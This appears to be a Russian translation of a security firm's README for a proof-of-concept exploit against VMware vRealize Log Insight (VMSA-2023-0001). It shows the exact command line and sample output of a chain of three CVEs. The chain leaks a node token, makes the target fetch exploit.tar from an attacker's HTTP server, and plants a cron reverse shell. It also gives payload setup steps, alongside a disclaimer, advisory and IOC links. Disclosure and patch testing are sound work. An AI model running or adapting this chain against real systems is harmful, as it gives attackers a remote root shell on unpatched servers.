
POC для RCE с использованием уязвимостей, описанных в VMSA-2023-0001
POC для VMSA-2023-0001, затрагивающий VMware vRealize Log Insight, который включает следующие CVE:
Конфигурация по умолчанию для этой уязвимости записывает cron-задание для создания обратной оболочки. Обязательно измените файл payload в соответствии с вашим окружением.
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive
Для анализа экземпляров Log Insight на предмет индикаторов компрометации ознакомьтесь с нашим блогом об IOC: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
Этот POC использует различные конечные точки Thrift RPC для достижения произвольной записи файлов.
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
При использовании payload на основе cron убедитесь, что файл payload имеет соответствующие права доступа и владельца:
sudo chown root:root payload
sudo chmod 0644 payload
Обновитесь до последней версии или примените меры, следуя инструкциям в VMSA https://www.vmware.com/security/advisories/VMSA-2023-0001.html
Это программное обеспечение создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для использования при атаках на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.